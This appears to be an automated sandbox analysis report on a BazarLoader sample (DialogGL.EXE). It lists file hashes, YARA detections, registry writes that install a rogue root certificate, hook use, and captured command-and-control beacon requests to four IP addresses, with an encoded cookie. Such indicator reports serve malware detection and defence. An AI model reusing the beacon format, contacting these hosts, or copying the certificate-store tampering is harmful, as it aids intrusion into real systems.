bazarloader | 1625a3baefca74d244796f8ba85972350fda0994cf6752ac4d8ea8ff93052f42

General

Target

DialogGL.EXE
Size

224KB
MD5

3e494cf9a64f6836638f8f99d4015d5b
SHA1

de1d042453c77ba66bb9993c40245fd493fcb679
SHA256

1625a3baefca74d244796f8ba85972350fda0994cf6752ac4d8ea8ff93052f42
SHA512

e2db480175db189de53d35fe6a2318f9ccafec0ca709efa35d38444f52ab1a4db60a7ce9f4414131ee478dd262c50d904eec5eaf6fbd98b2ca2e95c590c89dee

Score

10^/10

bazarloader dropper loader

Malware Config

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 4 IoCs

resource	yara_rule
behavioral1/memory/2028-61-0x00000000003D0000-0x00000000003E4000-memory.dmp	BazarLoaderVar1
behavioral1/memory/2028-64-0x0000000000440000-0x0000000000456000-memory.dmp	BazarLoaderVar1
behavioral1/memory/2028-67-0x00000000003B0000-0x00000000003C1000-memory.dmp	BazarLoaderVar1
behavioral1/memory/1808-72-0x0000000001D80000-0x0000000001D96000-memory.dmp	BazarLoaderVar1

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

description	flow	ioc
HTTP URL	17	https://api.opennicproject.org/geoip/?bare&ipv=4&wl=all&res=8

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\AA432E342D22E6C0593C523A85685C5C02C4B804\Blob = 0f0000000100000020000000fb0572570a9a42e1c7d0937283f0cf7957a8e2d8ca1b43e995d0602d8493656e030000000100000014000000aa432e342d22e6c0593c523a85685c5c02c4b8042000000001000000f9020000308202f5308201dda00302010202104bca4bd8ddc18988aa683b112706b736300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303930323133303030305a170d3236303930313133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b612d5fed17f69196f1c36c8a7157b44bb5789c4ee593e22fdd0fed9682912a6a831652ffbf5c36354a8c3338641fee7a365564803a3dc8eb5e0d0562e2ca32083268c1122695803f17f578c46c9b82d5973da6e608dd78a9d526d8ccdd85e5595bb0cfeaa2bb09127bc5511882c745d12553ff484b6e4d4e21b0c02a6042649404de6323ffb172ac8a2559d8ce24956e1584987d4256f6cd5aa29942af99758a4690df4eea3820226fb1b84975059d81d7e9e53b96bc5019a211e6b7053e56c56f2ded89f35c3538d2b0fce54214693adaf319df401756543b1e0b9016a2db8e5fb6ed998fb8bcb5c437a6ef88337622f13df73c128127484ab2af5501912a90203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604149653bfe809ca0570416fa79bf3ed6c164bfd0f8b300d06092a864886f70d01010b05000382010100b49e2617f0e65a68dcfc648ec2b2cede651dba7309a2f637448f0ea66af2ac3719989d1b15d1e06f14be325b114c53e5f57011f609fb20b8c385c8278196a5bff2b0fcc3b1a647111c6fe7b983cd6397ffcc78d5765e5fc888808e1dbcd4df875b4b32f5be6d92b8d5c67dbb9fdc9fb1d5bdf3d0225119ba992165112f9d1d7eef45ba277b506f44d9ceeb9634096dbc6b4a6b9a53e10b2f0497f2247163609d39bd45d91b08aedae6939967869b682bbd6534140bb677c577e31308a3a519277cbd76a99825e651944bb8fef0f1057fce35c198e24ed6e0a14d7bc30447f5de7cb3841a28c62cc40eec83cb4c2ff11d2a23f39c1e7c48026e00b7adeb517e38	DialogGL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\AA432E342D22E6C0593C523A85685C5C02C4B804\Blob = 1400000001000000140000009653bfe809ca0570416fa79bf3ed6c164bfd0f8b030000000100000014000000aa432e342d22e6c0593c523a85685c5c02c4b8040f0000000100000020000000fb0572570a9a42e1c7d0937283f0cf7957a8e2d8ca1b43e995d0602d8493656e2000000001000000f9020000308202f5308201dda00302010202104bca4bd8ddc18988aa683b112706b736300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303930323133303030305a170d3236303930313133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b612d5fed17f69196f1c36c8a7157b44bb5789c4ee593e22fdd0fed9682912a6a831652ffbf5c36354a8c3338641fee7a365564803a3dc8eb5e0d0562e2ca32083268c1122695803f17f578c46c9b82d5973da6e608dd78a9d526d8ccdd85e5595bb0cfeaa2bb09127bc5511882c745d12553ff484b6e4d4e21b0c02a6042649404de6323ffb172ac8a2559d8ce24956e1584987d4256f6cd5aa29942af99758a4690df4eea3820226fb1b84975059d81d7e9e53b96bc5019a211e6b7053e56c56f2ded89f35c3538d2b0fce54214693adaf319df401756543b1e0b9016a2db8e5fb6ed998fb8bcb5c437a6ef88337622f13df73c128127484ab2af5501912a90203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604149653bfe809ca0570416fa79bf3ed6c164bfd0f8b300d06092a864886f70d01010b05000382010100b49e2617f0e65a68dcfc648ec2b2cede651dba7309a2f637448f0ea66af2ac3719989d1b15d1e06f14be325b114c53e5f57011f609fb20b8c385c8278196a5bff2b0fcc3b1a647111c6fe7b983cd6397ffcc78d5765e5fc888808e1dbcd4df875b4b32f5be6d92b8d5c67dbb9fdc9fb1d5bdf3d0225119ba992165112f9d1d7eef45ba277b506f44d9ceeb9634096dbc6b4a6b9a53e10b2f0497f2247163609d39bd45d91b08aedae6939967869b682bbd6534140bb677c577e31308a3a519277cbd76a99825e651944bb8fef0f1057fce35c198e24ed6e0a14d7bc30447f5de7cb3841a28c62cc40eec83cb4c2ff11d2a23f39c1e7c48026e00b7adeb517e38	DialogGL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\AA432E342D22E6C0593C523A85685C5C02C4B804\Blob = 190000000100000010000000dd6103ff7ad901c6e5dc245d0e95442f0f0000000100000020000000fb0572570a9a42e1c7d0937283f0cf7957a8e2d8ca1b43e995d0602d8493656e030000000100000014000000aa432e342d22e6c0593c523a85685c5c02c4b8041400000001000000140000009653bfe809ca0570416fa79bf3ed6c164bfd0f8b2000000001000000f9020000308202f5308201dda00302010202104bca4bd8ddc18988aa683b112706b736300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3231303930323133303030305a170d3236303930313133303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100b612d5fed17f69196f1c36c8a7157b44bb5789c4ee593e22fdd0fed9682912a6a831652ffbf5c36354a8c3338641fee7a365564803a3dc8eb5e0d0562e2ca32083268c1122695803f17f578c46c9b82d5973da6e608dd78a9d526d8ccdd85e5595bb0cfeaa2bb09127bc5511882c745d12553ff484b6e4d4e21b0c02a6042649404de6323ffb172ac8a2559d8ce24956e1584987d4256f6cd5aa29942af99758a4690df4eea3820226fb1b84975059d81d7e9e53b96bc5019a211e6b7053e56c56f2ded89f35c3538d2b0fce54214693adaf319df401756543b1e0b9016a2db8e5fb6ed998fb8bcb5c437a6ef88337622f13df73c128127484ab2af5501912a90203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604149653bfe809ca0570416fa79bf3ed6c164bfd0f8b300d06092a864886f70d01010b05000382010100b49e2617f0e65a68dcfc648ec2b2cede651dba7309a2f637448f0ea66af2ac3719989d1b15d1e06f14be325b114c53e5f57011f609fb20b8c385c8278196a5bff2b0fcc3b1a647111c6fe7b983cd6397ffcc78d5765e5fc888808e1dbcd4df875b4b32f5be6d92b8d5c67dbb9fdc9fb1d5bdf3d0225119ba992165112f9d1d7eef45ba277b506f44d9ceeb9634096dbc6b4a6b9a53e10b2f0497f2247163609d39bd45d91b08aedae6939967869b682bbd6534140bb677c577e31308a3a519277cbd76a99825e651944bb8fef0f1057fce35c198e24ed6e0a14d7bc30447f5de7cb3841a28c62cc40eec83cb4c2ff11d2a23f39c1e7c48026e00b7adeb517e38	DialogGL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	DialogGL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	DialogGL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\AA432E342D22E6C0593C523A85685C5C02C4B804	DialogGL.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2028	DialogGL.EXE
2028	DialogGL.EXE
1808	DialogGL.EXE
1808	DialogGL.EXE

C:\Users\Admin\AppData\Local\Temp\DialogGL.EXE
"C:\Users\Admin\AppData\Local\Temp\DialogGL.EXE"
1⤵
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:2028

C:\Users\Admin\AppData\Local\Temp\DialogGL.EXE
C:\Users\Admin\AppData\Local\Temp\DialogGL.EXE {BD100145-C8FC-4B71-A3C6-375065B332A4}
1⤵
- Suspicious use of SetWindowsHookEx
PID:1808

Network

DNS

microsoft.com

Remote address:

8.8.8.8:53

Request

microsoft.com

IN A

Response

microsoft.com

IN A

104.215.148.63

microsoft.com

IN A

40.76.4.15

microsoft.com

IN A

40.112.72.205

microsoft.com

IN A

40.113.200.201

microsoft.com

IN A

13.77.161.179
GET

https://107.173.192.166/engines/handle

DialogGL.EXE

Remote address:

107.173.192.166:443

Request

GET /engines/handle HTTP/1.1
Date: Thursday, 16 September 2021
Cookie: ANID=NWqEJnhzyDbrJQrdg282uQqIJsvXoDQiOXOAJhp49%2BAYwsxIKccGPVMcetHQz%2FNqmHQXdb2kaECvhwMEnXHlyV717vkFMtrgWyfjjGFAGKZEKEtOoH5AHhGFtdRCsK5qZyJ9pYkDCsdAemYwpHe47Fsr4JzIq2UFynFGCNJnV9TIJ7MgOPCWvXZcSmG5%2Fbu%2BWfZu12H5yZzpWq%2BjMcFk2hEb2oniuIQwTXR0wNI0qvpW76q5akPIHIIQbazUOhrV3bLovNWqOA%2FJ4IWittPo%2BVyKKS%2BYi9dj7INJLy5fjvX8BWxf8IlF4NDDo5WNi2AvoHZEbqk%2BVqXU6e8FJQP5NA%3D%3D;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 107.173.192.166

Response

HTTP/1.1 502 Bad Gateway

Server: nginx/1.14.2
Date: Thu, 16 Sep 2021 14:06:13 GMT
Content-Type: text/html
Content-Length: 575
Connection: keep-alive
GET

https://64.227.72.83/engines/handle

DialogGL.EXE

Remote address:

64.227.72.83:443

Request

GET /engines/handle HTTP/1.1
Date: Thursday, 16 September 2021
Cookie: ANID=NWqEJnhzyDbrJQrdg282uQqIJsvXoDQiOXOAJhp49%2BAYwsxIKccGPVMcetHQz%2FNqmHQXdb2kaECvhwMEnXHlyV717vkFMtrgWyfjjGFAGKZEKEtOoH5AHhGFtdRCsK5qZyJ9pYkDCsdAemYwpHe47Fsr4JzIq2UFynFGCNJnV9TIJ7MgOPCWvXZcSmG5%2Fbu%2BWfZu12H5yZzpWq%2BjMcFk2hEb2oniuIQwTXR0wNI0qvpW76q5akPIHIIQbazUOhrV3bLovNWqOA%2FJ4IWittPo%2BVyKKS%2BYi9dj7INJLy5fjvX8BWxf8IlF4NDDo5WNi2AvoHZEbqk%2BVqXU6e8FJQP5NA%3D%3D;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 64.227.72.83

Response

HTTP/1.1 502 Bad Gateway

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 16 Sep 2021 14:06:18 GMT
Content-Type: text/html
Content-Length: 568
Connection: keep-alive
GET

https://194.15.112.159/engines/handle

DialogGL.EXE

Remote address:

194.15.112.159:443

Request

GET /engines/handle HTTP/1.1
Date: Thursday, 16 September 2021
Cookie: ANID=NWqEJnhzyDbrJQrdg282uQqIJsvXoDQiOXOAJhp49%2BAYwsxIKccGPVMcetHQz%2FNqmHQXdb2kaECvhwMEnXHlyV717vkFMtrgWyfjjGFAGKZEKEtOoH5AHhGFtdRCsK5qZyJ9pYkDCsdAemYwpHe47Fsr4JzIq2UFynFGCNJnV9TIJ7MgOPCWvXZcSmG5%2Fbu%2BWfZu12H5yZzpWq%2BjMcFk2hEb2oniuIQwTXR0wNI0qvpW76q5akPIHIIQbazUOhrV3bLovNWqOA%2FJ4IWittPo%2BVyKKS%2BYi9dj7INJLy5fjvX8BWxf8IlF4NDDo5WNi2AvoHZEbqk%2BVqXU6e8FJQP5NA%3D%3D;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 194.15.112.159

Response

HTTP/1.1 502 Bad Gateway

Server: nginx/1.14.2
Date: Thu, 16 Sep 2021 14:06:22 GMT
Content-Type: text/html
Content-Length: 575
Connection: keep-alive
GET

https://64.225.67.166/engines/handle

DialogGL.EXE

Remote address:

64.225.67.166:443

Request

GET /engines/handle HTTP/1.1
Date: Thursday, 16 September 2021
Cookie: ANID=NWqEJnhzyDbrJQrdg282uQqIJsvXoDQiOXOAJhp49%2BAYwsxIKccGPVMcetHQz%2FNqmHQXdb2kaECvhwMEnXHlyV717vkFMtrgWyfjjGFAGKZEKEtOoH5AHhGFtdRCsK5qZyJ9pYkDCsdAemYwpHe47Fsr4JzIq2UFynFGCNJnV9TIJ7MgOPCWvXZcSmG5%2Fbu%2BWfZu12H5yZzpWq%2BjMcFk2hEb2oniuIQwTXR0wNI0qvpW76q5akPIHIIQbazUOhrV3bLovNWqOA%2FJ4IWittPo%2BVyKKS%2BYi9dj7INJLy5fjvX8BWxf8IlF4NDDo5WNi2AvoHZEbqk%2BVqXU6e8FJQP5NA%3D%3D;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 64.225.67.166

Response

HTTP/1.1 502 Bad Gateway

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 16 Sep 2021 14:06:27 GMT
Content-Type: text/html
Content-Length: 568
Connection: keep-alive
DNS

api.opennicproject.org

DialogGL.EXE

Remote address:

8.8.8.8:53

Request

api.opennicproject.org

IN A

Response

api.opennicproject.org

IN CNAME

api.opennic.org

api.opennic.org

IN A

116.203.98.109
GET

https://api.opennicproject.org/geoip/?bare&ipv=4&wl=all&res=8

DialogGL.EXE

Remote address:

116.203.98.109:443

Request

GET /geoip/?bare&ipv=4&wl=all&res=8 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: api.opennicproject.org

104.215.148.63:443

microsoft.com

tls

301 B
179 B
4
4
104.215.148.63:443

microsoft.com

tls

242 B
179 B
4
4
107.173.192.166:443

https://107.173.192.166/engines/handle

tls, http

DialogGL.EXE

1.6kB
3.0kB
15
15

HTTP Request

GET https://107.173.192.166/engines/handle

HTTP Response

502
64.227.72.83:443

https://64.227.72.83/engines/handle

tls, http

DialogGL.EXE

1.7kB
3.1kB
15
16

HTTP Request

GET https://64.227.72.83/engines/handle

HTTP Response

502
194.15.112.159:443

https://194.15.112.159/engines/handle

tls, http

DialogGL.EXE

1.7kB
3.1kB
15
16

HTTP Request

GET https://194.15.112.159/engines/handle

HTTP Response

502
64.225.67.166:443

https://64.225.67.166/engines/handle

tls, http

DialogGL.EXE

1.6kB
4.0kB
14
17

HTTP Request

GET https://64.225.67.166/engines/handle

HTTP Response

502
116.203.98.109:443

https://api.opennicproject.org/geoip/?bare&ipv=4&wl=all&res=8

tls, http

DialogGL.EXE

1.2kB
5.3kB
8
11

HTTP Request

GET https://api.opennicproject.org/geoip/?bare&ipv=4&wl=all&res=8

8.8.8.8:53

microsoft.com

dns

59 B
139 B
1
1

DNS Request

microsoft.com

DNS Response

104.215.148.63

40.76.4.15

40.112.72.205

40.113.200.201

13.77.161.179
8.8.8.8:53

api.opennicproject.org

dns

DialogGL.EXE

68 B
110 B
1
1

DNS Request

api.opennicproject.org

DNS Response

116.203.98.109

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1808-72-0x0000000001D80000-0x0000000001D96000-memory.dmp

Filesize
88KB

Download
memory/2028-60-0x00000000762C1000-0x00000000762C3000-memory.dmp

Filesize
8KB

Download
memory/2028-61-0x00000000003D0000-0x00000000003E4000-memory.dmp

Filesize
80KB

Download
memory/2028-64-0x0000000000440000-0x0000000000456000-memory.dmp

Filesize
88KB

Download
memory/2028-67-0x00000000003B0000-0x00000000003C1000-memory.dmp

Filesize
68KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.